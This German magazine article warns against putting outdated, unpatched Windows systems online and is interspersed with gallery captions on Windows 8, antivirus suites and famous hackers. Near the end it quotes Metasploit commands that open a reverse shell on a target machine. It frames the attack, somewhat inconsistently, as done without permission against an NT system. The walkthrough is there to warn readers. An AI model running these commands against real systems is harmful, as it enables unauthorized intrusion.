Nicht mit alten Systemen ins Netz!

Von: Thomas Bär und Frank-Michael Schlede
Letzte Aktualisierung:
2_02408324_2408325.jpg

Aachen. Eigentlich läuft der alte Computer noch ganz anständig, reagiert relativ flüssig und erledigt alles, was der Benutzer braucht. Warum also wechseln? Wir zeigen die Gefahren, die von „Windows-Oldtimern” ausgehen.

Technikaffine Benutzer aus der Kategorie „Ich brauche immer das Neueste” betrachten ihre Windows-Systeme eher unter Aspekten wie: Gibt es schon die richtige Software, die die Maschine auch wirklich auslastet? Wurde die Sicherheitssoftware auf mein neues Wunschbetriebssystem hin überarbeitet? Funktioniert die VPN/SSL-Verbindung ins Unternehmen auch mit meinem aktuellen System?

Anwender, wie die Industrie sie sich sicher wünscht. In der Realität gibt es jedoch sehr viele Nutzer, die möglichst gar nichts verändern möchte. Es geht zumeist nicht (nur) um die Unlust, neue Funktionen kennenzulernen - es ist die Angst, dass nach einem Wechsel etwas nicht mehr so läuft wie bisher oder der Rechner gleich ganz aufgibt. Ganz im Sinne der Devise „Never change a running system.”

So vergeht Jahr um Jahr und die „alten Kisten” unter Windows 98, Windows 2000 oder Windows NT und vielleicht sogar Windows ME werden gehegt und gepflegt. Auch das zuverlässige „Arbeitspferd” Windows XP fällt so langsam in die Kategorie der Systeme, die mit der Begründung „läuft doch” ohne großes Nachdenken im täglichen Betrieb zum Einsatz kommen.

Das gilt auch für die direkten Verbindungen mit Netzwerken und dem Internet - hier ist jedoch der Punkt erreicht, wo es mit der Ruhe vorbei sein sollte. Alte Systeme, die weder regelmäßig gewartet noch mit Updates versehen werden, stellen eine akute Gefahr für die Sicherheit dar: Wir zeigen, warum es sträflich leichtsinnig ist, beispielsweise mit einem Windows-NT-System im Internet unterwegs zu sein.

Am 8. April 2014 endet auch der sogenannte „erweiterte Produktsupport” für die letzte Version von Windows XP mit Service Pack (SP3). Wer noch einen XP-Rechner verwendet und den Windows Update Dienst stets eingeschaltet hat, braucht sich um den Service-Pack-Stand deshalb nach wie vor keine Gedanken zu machen: Die Aktualisierung wird automatisch durchgeführt. Das ist auch der Grund, warum Anwender - bei aller Angst davor, dass ihr System „nach Hause telefoniert” und Microsoft angeblich zu viele Informationen über den XP-Rechner bekommt - auf keinen Fall die automatischen Updates abschalten sollten.

Tun sie es doch, sollten sie wenigstens manuell sicherstellen, dass wichtige Updates und Patches auf ihr System gelangen. Wer auf Nummer sicher gehen möchte, kann durch einen Rechtsklick auf den Arbeitsplatz die "Eigenschaften" des Systems zur Ansicht bringen. Im obersten Informationsblock steht die Version, beispielsweise „Service Pack 3”.

Ein „ganz altes” Windows-Betriebssystem (Windows Me): Für solche Systeme bietet Microsoft schon lang keine Updates mehr an. Wer auf „Windows Update” klickt, landet im Internet Explorer in einer Endlosschleife.

Windows XP 32-Bit mit Service Pack 3: Diese Betriebssystemversion wird noch bis zum 8.April 2014 mit sicherheitsrelevanten Updates versorgt werden.

Eine mit dem Service Pack 2 eingeführt Änderung erhöhte einst die Betriebssicherheit: Wer über das Netzwerk zugreift, hat in der Standardeinstellung nur noch Gast-Rechte.

Auf die Dauer eher hinderlich, als dass es mehr Sicherheit bringt: Das Ausschalten von gefährdeten Diensten kann hier nicht viel helfen.

Besonders veraltete Browser, hier der Internet Explorer 6 von Microsoft, stellen ein hohes Sicherheitsrisiko für den PC dar.

Veraltete Software, hier exemplarisch der Adobe Acrobat Reader 7, ist ebenfalls ein Sicherheitsrisiko. Adobe stellt Updates nur für einen deutlich kürzeren Zeitraum als Microsoft bereit.

Das Ende des Produkts (End Of Lifecycle) ist bei Microsoft kein Geheimnis - jeder kann es im Internet nachschlagen.

Eine Attacke auf ein altes Windows-System ist viel einfacher, als so mancher denkt: Gerade einmal vier Stunden inklusive Vorbereitungs- und Installationszeit benötigten die Autoren für einen erfolgreichen Hack.

In den Service Packs führt Microsoft eine große Anzahl von Korrekturen an seiner Software zusammen. Meist sind auch weitreichende sicherheitsrelevante Veränderungen integriert. Dazu gehörten schon bei SP2 für Windows XP: Die Aktivierung der Firewall in der Standardeinstellung; Das Hinzufügen des „Sicherheitscenter” zur Überwachung von Antivirus-Programmen; Das Hinzufügen von Firewall und Update-Dienst.

Zudem wurde eine tief im System verankerte Einstellung deaktiviert, die dafür sorgte, dass Benutzer, die über das Netzwerk auf den XP-Rechner zugegriffen haben, immer automatisch (!) als „Gast” authentifiziert wurden.

Da der Gast-Account zugleich auch deaktiviert wurde, war das System in dieser Grundeinstellung deutlich sicherer gegenüber Fremdzugriffen.

Wichtig: Solche tiefgreifenden Änderungen zugunsten der Sicherheit gibt es für alte Betriebssysteme - und damit auch für Windows XP - nicht mehr. Hier lauert einer weitere Gefahr: Auch die Installations-Medien der Betriebssysteme werden üblicherweise mit dem aktuellen Service Pack ausgeliefert. Wer also mithilfe der Wiederherstellungs-CD einen alten Marken-PC wieder neu aufsetzt, arbeitet möglicherweise auf einem sehr alten Softwarestand.

So haben wir testweise einen mittlerweile reichlich „verstaubten” Dell Dimension 4500 mit der Original-CD wieder aufgesetzt, der danach ein Windows XP auf dem Stand von SP1 besaß. Wer dann vielleicht aus Bequemlichkeit oder aus Angst vor Ausspähung die „Automatischen Updates” deaktiviert, begibt sich in sehr große Gefahr - die oben aufgeführten Sicherheitslücken erfüllen leicht die Kategorie „Scheunentore”.

Am 29. Februar 2012 hat Microsoft die Consumer Preview von Windows 8 veröffentlicht. Unser Autor hat die Vorabversion auf seinem Notebook installiert und berichtet im Tagebuch über seine Erfahrungen.

Nach der Installation ist vor der Nutzung: Am zweiten Tag kämpft unser Autor mit den neuen Apps für E-Mails, Termin- und Kontaktverwaltung. Und ärgert sich, dass Outlook zwar überflüssiger wird, Microsoft aber praktische Funktionen vergisst.

Am dritten Tag unseres Tagebuchs zu Windows 8 beschäftigt sich unser Autor genauer mit dem neuen Startmenü - und erklärt, warum der Umstieg zwar gewöhnungsbedürftig aber nicht unbedingt unangenehm ist.

Notebook-Hardware ist oft weniger exotisch als in Desktop-Systemen. Unser Autor prüft die Hardware-Unterstützung in Windows 8 und verzweifelt dabei fast an der UMTS-Unterstützung.

Ohne Programme macht Windows wenig Sinn. Unser Autor erklärt in seinem Windows-8-Tagebuch, ob der Windows Store bereits brauchbar ist und wo Probleme bei Softwareinstallation auftauchen.

Multimedia ist ein fester Bestandteil von Windows. Unser Autor überprüft, wie sich der jüngste Spross des Betriebssystems bei der Wiedergabe von Audio und Video schlägt und was die neuen Apps dabei leisten.

Unser Autor nutzt seit mehr als einer Woche die Vorschauversion von Windows 8 in der Praxis. Im heutigen Tagebucheintrag zieht er Zwischenbilanz.

Sichere Passwörter sind lang und schwierig zu merken. Unser Autor bevorzugt daher biometrische Systeme und freut sich über neue - kaum beworbene - Funktionen in Windows 8.

Nicht nur die Metro-Oberfläche ist neu, Microsoft verschafft auch dem Taskmanager einen neuen Anstrich und neue Funktionen. Aber ist das Tool damit auch besser

Windows 8 lässt sich erstmals offiziell auch von einem USB-Speicher starten. Unser Autor probiert die To-Go-Variante mit mehreren Festplatten aus und liefert eine Einschätzung des neuen Features.

Neben den auffälligen Neuerungen bringt die Consumer Preview von Windows 8 auch viele kleinere Funktionen, die nicht weniger erwähnenswert sind. Unser Autor gibt einen Überblick.

Aus heutiger (Sicherheits-) Sicht wirken viele Standardeinstellungen von Windows XP förmlich „steinzeitlich”: So besitzt der Benutzer eines XP-Computers in der Grundeinstellung üblicherweise Administrationsrechte und kann damit alle Parameter des Systems beliebig verändern. Folglich hat jedes Schadprogramm, das wissentlich oder eher unwissentlich vom Benutzer ausgeführt wird, diese hohen Zugriffsrechte ebenfalls.

In vielen Unternehmen wurden den Domänen-Benutzern zudem häufig lokale Administrationsrechte eingeräumt, da ansonsten einige Funktionalitäten im Zusammenspiel mit externer Hardware nicht einwandfrei arbeiteten. Beispielsweise war die anfängliche Synchronisation von Palm-Handhelds ohne Administrationsrechte eine Art „russisches Roulette” für die Outlook-Daten. Warum arbeiten aber auch heute die meisten XP-Systeme noch mit diesen hohen und damit riskanten Zugriffsrechten?

Hohe Zugriffsrechte waren zumeist ein Zugeständnis an die vielen Programme, die aus der NT/2000/98/ME-Welt direkt auf Windows XP ausführbar bleiben sollten.

Allerdings gab es bereits seit Mitte der 2000er-Jahre eigentlich keinen logischen Grund mehr, dem Benutzer so hohe Zugriffsrechte einzuräumen.

Viele IT-Professionals in den Unternehmen warteten da bereits auf einen Betriebssystem-Nachfolger und nahmen kaum noch Änderungen an den Grundeinstellung der XP-Systeme vor. Diese Systeme sind zum Teil heute noch im Einsatz!

Dieser direkte Nachfolger - das eher unbeliebte Windows Vista - war zwar deutlich sicherer, aber dadurch auch beinahe "unbedienbar": Die selektive Zugriffssteuerung UAC (User Account Control - Benutzerkontensteuerung) mit dem sichertechnisch sehr guten Prinzip einer virtueller Registry zur Aufnahme von Programmstammdaten wurde erst mit Windows 7 wirklich einsetzbar. So verwundert es kaum, dass auch Windows Vista bereits in der „Rente des Supports” angelangt ist - auch wenn dieses System lange nicht so unsicher ist wie seine Vorgänger

Trotzdem ist es wichtig zu wissen: Auch der Support für Windows Vista Service Pack 1 (SP1) endete bereits am 12. Juli 2011. Vista-Benutzer müssen, um weiterhin sicher arbeiten zu können, auf das Service Pack 2 (SP2) aktualisieren. Im April 2012 endete dann der so genannte „Mainstream Support” für Windows Vista SP2. Der Windows 7-Vorgänger befindet sich, wie Windows XP SP3, nun im erweiterten Produktsupport.

In dieser Phase kümmert sich Hersteller Microsoft nur noch um „sicherheitsrelevante Aktualisierungen”. Am 11.04.2017 endet dieser Support für Windows Vista endgültig, wie der Webseite "Product Lifecycle" von Microsoft entnommen werden kann.

Der Support für Windows XP SP2 endete schon am 13. Juli 2010. Die Unterstützung für das letzten Service Pack 3 endet, wie bereits erwähnt, am 8. April 2014. Da es für die wenig verbreitete x64-Variante von Windows XP kein Service Pack 3 gibt, endet die erweiterte Produktunterstützung für SP2 ebenfalls im April 2014.

Nicht, dass der Eindruck entstünde, dass das Produkt ab diesem Tag nicht mehr funktionieren würde: Das jeweilige Windows läuft weiter - nur eben ohne Updates durch den Hersteller und mit dem entsprechenden Sicherheitsrisiko.

Stellt Microsoft im April 2014 den Support für Windows XP endgültig ein, so heißt dies nichts weniger, als dass für Sicherheitslücken, die ab diesem Zeitpunkt entdeckt werden, keine Korrekturen mehr vorgenommen werden. Öffnet ein klassischer "Buffer Overflow" beispielsweise einem Angreifer Tür und Tor auf dem Computer, kann der Benutzer nicht mehr auf Hilfe von Microsoft hoffen. Der XP-PC bleibt somit für immer ungeschützt, sofern nicht dieAnpassung einer Firewall-Regel oder die Deaktivierung der betreffenden Softwarekomponente eine Notlösung bieten.

Ein Beispiel aus der täglichen Praxis: Unter der kryptischen Bezeichnung „2387149 (MS10-074) - Sicherheitslücke in Microsoft Foundation Classes (MFC)” wurde im Sommer 2010 eine Sicherheitslücke in den Dateien mfc40u.dll beziehungsweise mfc42u.dll entdeckt. Diese wurde für alle „aktuellen” Windows-Versionen geschlossen, nicht jedoch für Windows 2000. Der Support für den XP/2003-Vorgänger endete bereits am 13.07.2010 und folglich gab es keine Korrektur gegenüber der Remote Code Execution-Problematik mehr.

Eine weitere, für viele Anwender äußerst wichtige Software, stammt ebenfalls aus dem Hause Microsoft und wird für Windows XP SP2 32-Bit und höher geliefert: Microsoft Security Essentials. Hierbei handelt es sich um eine einfache, kostenfreie Anti-Virus-Software für Privatanwender und kleine Unternehmen. Es darf davon ausgegangen werden, dass Microsoft auch bei diesem Programm die Unterstützung für XP pünktlich im April 2014 einstellen wird.

Antivirus-Programme laufen zwar auch ohne die regelmäßigen Aktualisierungen der "Viren-Definitionsdatenbank" weiter, jedoch kann die Software auf neuere Bedrohungen nicht mehr reagieren. Viele Hersteller von Security-Lösungen wie beispielsweise Kaspersky oder AVG kündigen auch den Produkt-Support ihrer Programme relativ zeitnah zur Einstellung des Supports durch Microsoft ab.

Sophos fällt hier insgesamt positiv auf - der Hersteller liefert auch heute noch Antivirus-Lösungen für Windows 2000 Professional- und Server-Systeme SP3 und höher aus.

Sicherheitssoftwarehersteller haben es jedoch extrem schwer, für ein alterndes und immer unsicher werdendes Betriebssystem eine entsprechend sichere Antivirensoftware zu liefern. Das Schutzprogramm kann sich einfach nicht mehr darauf verlassen, dass die darunterliegende Softwareschicht wirklich verlässliche Informationen zurückgibt.

Mit der der Generation 2012 halten nun auch in der Kaspersky Internet Security Cloud-Funktionen Einzug. Das Kaspersky Security Network getaufte System lässt sich optional zuschalten und schickt Informationen über erkannte Bedrohungen, laufende Programme uvm. an Kaspersky Lab, wo die gesammelten Daten aller Programmteilnehmer ausgewertet werden. Auf diese Weise finden Warnungen zu etwaigen Schadprogrammen schneller den Weg zum Anwender, als es über normale Virensignatur-Updates der Fall wäre.

Das Komplettpaket von BitDefender, Total Security 2011, soll vor allen gängigen Gefahren durch Malware, Hacker, Phising und Co. schützen, bietet jedoch auch zusätzliche Funktionen wie die Kindersicherung, Backup-Features und selbst eine Leistungsoptimierung an, die gängige Tune-up-Programme zu ersetzen vermag.

G Data InternetSecurity 2012 gehört der diesjährigen neuen Genaration von Security-Suiten an. Noch immer bietet die Software Anti-Malware, Anti-Spam und eine Zwei-Wege-Firewall. In Version 2012 wurde das Outlook-Plugin überarbeitet, das für Spam- und Malware-Erkennung zuständig ist. Weiterhin liegt dem Paket eine Jahreslizenz für G Data MobileSecurity bei, mit der sich Android-Smartphones überwachen lassen.

Anti-Malware, Zwei-Wege-Firewall, PC-Tuning: Norton 360 5.0 verspricht dies alles. Doch die Werkzeuge, die der Software zur Verfügung stehen, sind damit noch nicht erschöpft. Weitere Funktionen sind Routinen zur automatischen Datensicherung und - wiederherstellung, ebenso wie ein zwei Gigabyte großer Online-Tresor für Persönliches.

Auch um die E-Mail-Sicherheit kümmert sich Norton 360 5.0 und wickelt Malware-Nachrichten, Phishing-Mails und elektronischen Werbemüll ab. Abschießend sind noch die Kinder-Schutzfunktionen der Software zu erwähnen, die das Beaufsichtigen des Nachwuchses erleichtern.

Panda Security hat seine Security Suite konsequent weiterentwickelt. Die Version Panda Internet Security 2012 setzt noch stärker auf die Cloud als bisherige Versionen der Software. Da alle Nutzer gemeinsam Informationen über das Verhalten von potenzieller Schadsoftware sammeln und diese Informationen in der Cloud geteilt werden, soll ein noch besserer Schutz vor unbekannten Bedrohungen gewährleistet sein. Die integrierte Firewall bietet in der aktuellen Version eine verbesserte Überwachung von WLAN-Netzwerken.

Eine virtuelle Tastatur macht das Eingeben von Login-Daten sicherer. Zudem gibt es die Option den Browser in einer Sandbox auszuführen, dadurch soll die Sicherheit beim Surfen steigen. Der Multimedia-Modus sorgt für eine geringe Systembeeinträchtigung beim Betrachten von Videos, Hören von Musik oder beim Spielen.

IT-Sicherheit aus deutschen Landen bietet das Komplettpaket Avira Premium Security Suite 10 an. Der Funktionsumfang ist für Privatanwender absolut ausreichend und umfasst typische Schutzfunktionen gegen Malware, Spam, Phishing und Hacker. Selbst Datenverlust lässt sich mit den Backup-Funktionen der Software einschränken. Speziell für Netbooks wird auch ein Bedienmodus angeboten, der mit der geringeren Auflösung der kleinen Rechner zurecht kommt. Der GameMode und Kinderschutz sind nette Dreingaben für Benutzer die sie benötigen.

Die erste Neuerung die F-Secure Internet Security 2011 auffällt ist die überarbeitete Benutzeroberfläche. Sie wirkt moderner und bündelt wichtige Kernfunktionen der Software an zentralen Menüpunkten. Aber auch unter der Haube hat F-Secure gearbeitet. Wie viele andere Security-Suiten bereits auch, ergänzt Internet Security 2011 seine Scan-Resultate um Erkenntnisse aus der Cloud, von F-Secure DeepGuard genannt. So sollen aktuelle Bedrohungen nahezu in Echtzeit identifiziert werden können und Schadprogramme noch vor dem nächsten Signatur-Update erkannt werden.

Kaspersky PURE offeriert dem Benutzer eine besonders breite Palette an Programmfunktionen, die über die gewöhnlichen Eigenschaften einer Security-Suite hinausgehen. Neben den normalen Sicherungsfunktionen wie Anti-Malware, einer Firewall und Web-Filtern bietet Kaspersky PURE eine Sicherungsfunktion zum Backup und der Wiederherstellung von Daten an. Weiterhin verschlüsselt das Programmpaket sensible Dokumente oder vernichtet unwiderruflich vertrauliche Daten. Mit dem integrierten Passwort-Manager sind Zugangsdaten sicher aufbewahrt.

Der Schutz von Endgeräten ist nur ein Teil der Funktionalität von AVG Internet Security Business Edition 2011. Malware, Spam und Hackern soll die Security-Suite auf Laptops und PCs den Garaus machen. Aber auch Windows-basierte Fileserver und E-Mail-Server deckt AVG mit seinem Produkt ab. Um Internet Security Business Edition 2011 im gesamten Unternehmen schnell ausrollen zu können, legt AVG seinem Produkt eine aktualisierte Version der Remote-Verwaltungskonsole bei.

Avira Internet Security 2012 bietet Rundumschutz für das heimische System. Neben dem bekannten Antivirus-Modul, sind auch Tools gegen Phishing- und Spam-Attacken an Bord. Zusätzlich hilft Avira Internet Security 2012 bei der Datensicherung und besitzt überdies noch eine Kindersicherung. Mit dieser überwachen Sie die Internetaktivitäten des Nachwuchses.

Sollten trotz FireWall, Drive-by-Download-Schutz und Echtzeit-Programm-Scanner doch einmal Schadcode auf den Rechner gelangen entfernen Sie diesen bequem und automatisch mit Hilfe der Generischen Reparatur. Für den schlimmsten Fall ist ein Rescue-System mitgeliefert, so retten Sie wenigstens Ihre Dokumente und Dateien. Dank weiter reduzierter Hardwareanforderungen soll Avira Internet Security 2012 auch problemlos auf Netbooks oder ähnlich schwachen Rechnern laufen.

Das "Hacking", das unerlaubte und möglichst unbemerkte Eindringen auf einen PC oder in eine Netzwerkstruktur, gilt gemeinhin als „hohe Kunst” in der IT. Hohes technisches Wissen, gepaart mit krimineller Energie, wird den Personen nachgesagt, die sich dem Hacking verschreiben haben.

Wir haben uns einmal selbst daran versucht, ein altes, aber noch produktives Windows NT-System, ohne die passende Erlaubnis und ohne das Wissen der Administrationsberechtigung, über das Netzwerk übernehmen zu wollen. Die Standard-Applikationen für derlei "Penetration Testings" sind Metasploit und Nexpose von Rapid7. Für das Herunterladen, das Aufsetzen der virtuellen Maschine mit Windows Server 2003 Betriebssystem und den ersten Einblick der Software benötigten wir zirka vier Stunden.

Erschreckend einfach: Welche Sicherheitslücken die Software auf einem Zielrechner als "wahrscheinlich" einstuft, gibt Nexpose freizügig aus. In der Konsole von Metasploit mussten wir anschließend lediglich vier Eingaben vornehmen, ehe wir direkt in der Eingabeaufforderung des NT-Rechners landeten. Mit „set PAYLOAD generic/shell_reverse_tcp” wird die gewünschte „Sicherheitslücke„” anvisiert, mit „set LHOST 10.117.21.123” definierten wir unsere Maschine als ausführenden Angreifer und mit „set RHOST 10.117.18.104” das Ziel. Das Kommando „exploit” führt den gewünschten Befehl aus und keine zehn Sekunden später konnten wir alle administrativen Befehle auf dem Zielrechner ausführen!

Jeremy Jaynes stahl eine AOL-Datenbank mit mehr als 90 Millionen E-Mail-Adressen und versandte Spam-E-Mails. Er verdiente so zwischen 400.000 und 750.000 US-Dollar. Im November 2004 wurde er schuldig gesprochen und zu neun Jahren Haft verurteilt. Nach vier Jahren, 2008, kam er schon frei. Jaynes war übrigens der erste, der für das Versenden von unerlaubten Werbemails in den USA angeklagt wurde.

Vladimir Leonidovich Levin erleichterte die Citibank um 10 Millionen US-Dollar. 1995 fasste ihn Interpool, angeklagt wurde er aber erst 1998. Das Gericht verurteilte ihn zu drei Jahren Gefängnis und zu einer Geldstrafe von über 240.000 US-Dollar. Sein Hack ist der erste vollständig dokumentierte Online-Bankraub.

Kevin Mitnick ist wohl einer der bekanntesten Hacker der frühen Computergeschichte. Condor, wie sein Spitzname lautet, wird von der breiten Öffentlichkeit als der Hacker schlechthin angesehen. Ihm war es möglich, so ziemlich jeden Computer unter seine Gewalt zu bringen. Seinen umstrittenen Ruhm erreichte er durch diverse Hacks in das Netzwerk des Pentagons und in die NSA-Computer. Erstmals wurde Mitnick 1988 verhaftet.

1995 folgte der nächste längere Aufenthalt im Gefängnis. Nach fünfjähriger Haft wurde er mit einer Bewährungsauflage in die Freiheit entlassen. Er durfte für drei Jahre keine EDV-Systeme benutzen. 2003 war es Mitnick wieder erlaubt im Internet zu surfen. Sein erster Webseiten-Besuch wurde vom amerikanischen Fernsehen live übertragen. Heute fungiert Condor als Sicherheitsberater und Online-Journalist.

„Wissen muss für jeden Menschen gleich zugänglich sein!”: Diese durchaus sinnvolle Aussage stammt von einem deutschen Hacker-Anarchisten namens Karl Werner Lothar Koch. Hagbard Celine, sein Pseudonym in Netzwerken, wurde berühmt, durch den so genannten KBG-Hack. Seine Hacker-Gruppe drang in westliche Computersysteme ein, stahl Informationen und verkaufte diese schlussendlich an den sowjetischen Geheimdienst. Wegen lächerlichen 75 US-Cent Differenz in der Buchhaltung, enttarnte der amerikanische Astrophysiker Clifford Stoll die Machenschaften dieser Hacker-Vereinigung.

Unter anderem gründete Karl einen Ableger des Chaos Computer Clubs und war fortwährend davon überzeugt, dass Illuminaten existierten. Der dauerhaft Drogen konsumierende Hagbard versuchte diese durch seine Hacks in die Schranken zu weisen. 1989 wurde Karl Kochs verbrannte Leiche in einem Wald gefunden. Hacker-Freunde sind der festen Überzeugung, dass es sich um einen Mord handelte. Die offizielle Todesursache lautet Selbstverbrennung.

Laut Kimble, wie sich Kim Schmitz in der Hacker-Szene nannte, hatten seine Hacker-Taten das „rühmliche” Motiv, die Firmen auf Sicherheitsmängel aufmerksam zu machen. Trotzdem war er unumstritten der Medienkönig der deutschen Hacker-Szene, verantwortlich für Computermanipulationen, Kreditkartenfälschungen, Einbrüche in Großrechner oder diverse Datenausspähungen. Sein kriminelles Computerunwesen trieb er weltweit.

Beispielsweise hackte er auch amerikanische Calling-Cards, rief mit deren Hilfe seine gegründeten Talk-Lines an und kassierte schlussendlich enorme Geldsummen ein. Dies ist nur eines von vielen Vergehen. 1994 durfte Kim erstmalig dem Knast einen Besuch abstatten. Mittlerweile widmet sich Kimble legaleren Angelegenheiten, wie etwa als Geschäftsführer einer Datensicherheits-Firma.

Robert Tappan Morris, auch bekannt unter dem Kürzel rtm, ist verantwortlich für den ersten Internet-Wurm der Computergeschichte. Im Jahre 1988 programmierte er im Alter von 23 den mittlerweile legendären Morris-Wurm. Ironischerweise war zu dieser Zeit sein Vater der Chef der NSA-Sicherheitsabteilung. Robert wurde als Urheber des Wurms geschnappt, zu einer Bewährungsstrafe verklagt, bekam eine saftige Geldstrafe und musste sozialen Dienst ableisten. Heute unterrichtet Professor Robert Tappan Morris am weltberühmten Massachusetts Institute of Technology, kurz MIT.

Robert Alan Soloway, alias Badvertise500, Oregondude541 oder auch Worldmailer541 hat es geschafft, er kann sich als Top-Ten-Spammer bezeichnen. In seinen besten Zeiten hat er annähernd 500 Millionen bis zu einer Milliarde Mails pro Tag versendet. Robert verdiente sich seinen Unterhalt indem er Firmen Mail-Adressen zur Verfügung stellte und Spam-Mails verschickte. Bereits 2005 wurde er zu einer Zahlung von sieben Millionen US-Dollern an Microsoft verurteilt. Den Höhepunkt seiner dubiosen Karriere erreichte er im Mai 2007. Er wurde in Untersuchungshaft genommen und wurde wegen 35 Anklagepunkten dem Richter vorgeführt. Eine Verurteilung steht noch aus.

Kevin Lee Poulsen, alias Dark Dante, beschäftigte sich schon in jungen Jahren mit Phreaking, dem Manipulieren von Telefonanrufen mittels Pfeifsignalen. Eigentliche wollte Dark Dante Anfang der Neunziger nur ein paar Reisen gewinnen, etwas „Taschengeld” sein Eigen nennen und in einem sportlichen Porsche durch die Gegend heizen. Diese Wünsche erfüllte er sich durch konkrete Manipulation der Telefonanlagen von Radiostationen.

Beispielsweise gewann jeder 102. Anrufer bei den KISS-FM-Wettbewerben nicht minder wertvolle Preise. Natürlich waren Kevin und seine Freunde Ronald Austin und Justin Peterson des Öfteren der 102. Anrufer. Spionage wurde Poulsen im Jahre 1992 unterstellt. Auch für so manch illegalen Hack in die Systeme von Telefongesellschaften ist er verantwortlich. Insgesamt verbrachte Dark Dante fünf Jahre hinter Gitter. Wie viele Ex-Hacker beschäftigt sich Poulsen heutzutage mit der Sicherheitsproblematik und ist als freier Journalist tätig.

In Hacker-Kreisen wird unterschieden zwischen guten und schlechten Taten. Diejenigen, die schlimmes im Sinn haben, werden als „Black Hats” bezeichnet. Die „guten” Hacker, wie es beispielsweise Tsutomu Shimomura ist, werden „White Hat” genannt. Geschichtlich betrachtet, erreichte er seine Berühmtheit durch die Verfolgung von Kevin Mitnick. Eines schönen Tages drang Kevin in das Netzwerk-System des Supercomputing Centers in San Diego ein. Sein Pech, dass Tsutomu Shimomura dort arbeitete, den Hack und Datenklau bemerkte und die digitale Verfolgung aufnahm. Tsutomus Hacker-Einsatz führte schlussendlich zur Verhaftung von Condor.

Sanford Wallace, auch bekannt unter dem Pseudonym „Spamford”, hat sich einen Namen als Massenversender von Spam-Mails gemacht. Spamford hatte anscheinend schon immer etwas übrig für die Belästigung von Personen durch ungewollte Mitteilungen. Seine Karriere startete er mit Werbefaxen, so genannten „Junk Fax”. In den späten Neunzigern gründete Sanford die Firma Cyber Promotions.

Die Selbstvermarktungskampagne, durch Mail-Spamming, verhalf Sanfords Firma Cyber Promotions zu einer Spitzenposition im Mail-Marketing. In den folgenden Jahren ging es bergauf und bergab mit seinen Spam-Vorhaben. Abermals erregte er Aufsehen mit der Beteiligung an dem Projekt SmartBotPro. Die Software SmartBot verbreitete eine Spyware, freundlicherweise bat die Firma gleichzeitig auch eine Software zur Entfernung für 30 US-Dollar an. Schlussendlich wurde SmartBot verklagt und musste eine Strafe von über vier Millionen US-Dollern akzeptieren.

Boris F., besser bekannt als Tron, galt als einer der talentiertesten Hacker seiner Zeit. Im Gegensatz zu Kim und Karl ging es ihm nie ums Geld. Er wollte mit seinen Hacks nur beweisen, dass fast jedes Computer-System der Welt Lücken vorweist. Ihm machte es einfach Spaß, sich mit der Elektronik und den damit verbundenen Sicherheitssystemen auseinanderzusetzen. Beispielsweise knackte er Bezahlsender und Telefonkarten-Unternehmen.

Grundsätzlich ging es Tron aber im darum, sich mit vermeintlich sicheren Standards auseinanderzusetzen und daran „rumzufummeln”. So gelang es ihm beispielsweise, dramatische Sicherheitslücken in dem weltweit anerkannten Mobilfunkstandard GSM ausfindig zu machen. Nicht nur diese „Heldentat” verschaffte ihm einen Ehrenplatz im Chaos Computer Club. Im Oktober 1998 fand ein Spaziergänger an einem Baum die erhängte Leiche von Boris F. Der CCC zweifelt bis heute an dem angeblichen Selbstmord von Tron.

Gary McKinnon, besser bekannt unter seinem Alias Solo, hat anscheinend eine Schwäche für UFOs und außerirdische Lebensformen. Eigenen Angaben zufolge, drang er nämlich nur in die Computer des amerikanischen Militärs, der NASA, des Pentagons und zahlreichen anderen wichtigen Organisationen ein, um Information über UFOs zu erhalten. Sie können es glauben oder nicht - er behauptet jedenfalls, dass er so manchen Hinweis entdeckt hätte. Trotzdem wartet der britische Systemadministrator noch immer auf seine Auslieferung und Verurteilung in den USA. Im schlimmsten Fall muss er eine siebzigjährige Haftstrafe absitzen, denn dieser Gray-Hat-Hacker wird beschuldigt „den größten Angriff auf militärische Computer” begangen zu haben.

Alan Ralsky bezeichnete sich selbst als legalen, kommerziellen E-Mailer, obwohl er jahrelang Internetnutzer mit Spam belästigte. Beispielsweise bewarb er kleine, chinesische Firmen mit Spam-Mails. Zuvor hatte er sich aber kräftig mit Firmen-Aktien eingedeckt. Diese illegale Werbekampagne hatte einen kurzzeitigen Anstieg des Kurses zur Folge - genug Zeit, dass Alan seine Aktien gewinnbringend verkaufen konnte. Nur eines seiner wirtschaftlich lukrativen Tätigkeitsfelder. Januar 2008 wurde Ralsky wegen seiner dubiosen Machenschaften, wie etwa Aktienbetrug, Geldwäsche und Botnetz-Betrieb vom US-Bundesgericht angeklagt.

John T. Draper, besser bekannt unter dem Pseudonym Captain Crunch, ist einer der bekanntesten Hacker und Phreaker der sechziger und siebziger Jahre des letzten Jahrtausends. Seine Popularität verdankt er einer Spielzeug-Pfeife, die als Werbeaktion den so genannten Capn Crunch Cornflakes beilag. Er fand heraus, dass er durch Abkleben einiger Pfeifenlöcher einen Frequenz-Ton von genau 2600 Hertz erreichen konnte. Pfiff er diesen Ton in den Telefonhörer, war er in der Lage, Telefonate zu manipulieren. Seine Methode des Telefon-Phreakings wurde weiterentwickelt und führte schlussendlich zu dem feststehenden Begriff des Blue-Boxings.

Schnell verbreitete sich dieser Phreaking-Weg in der Szene, sogar das organisierte Verbrechen, wie etwa die Mafia, wurde auf Drapers Errungenschaft aufmerksam. 1971 wurde Captain Crunch erstmalig verhaftet, schloss aber gleichzeitig Freundschaft mit Steve Jobs und Steve Wozniak. Unter anderem programmierte er in seiner Haftzeit das erste Textverarbeitungs-Tool Easy Writer für den Apple II.

Das hätte genauso gut ein Windows 2000 oder XP-Computer mit fehlenden Patches sein können, wie das Internet-Video "Shell Root" auf YouTube eindrucksvoll zeigt. Uns geht es bei diesem Hinweis natürlich nicht darum, dem strafrechtlich relevanten "Hacking" Vorschub zu leisten; eher möchten wir Sie als Leser auf diese „reale Gefahr” hinweisen und zeigen, wie leicht es ist, ein solches System zu kompromittieren.

Ohne Frage ist das Betriebssystem bezüglich der Betriebssicherheit die wichtigste und erste Adresse. Die auf dem Betriebssystem ausgeführten Programme dürfen jedoch in der Gesamtbetrachtung auf keinen Fall vernachlässigt werden. Auch wenn das Windows XP an sich auf dem neuesten Stand gehalten wird, so kann die Verwendung des Internet Explorers 6, eines restlos veralteten Firefox 3.5 oder eines ebenfalls „ergrauten” Adobe Acrobat 7 für Schadprogramme das sprichwörtlich "gefundene Fressen" sein. Beinahe jede Software animiert den Benutzer regelmäßig dazu, Aktualisierungen einzuspielen, doch das hilft wenig, wenn dieser stets auf „Nein” klickt.

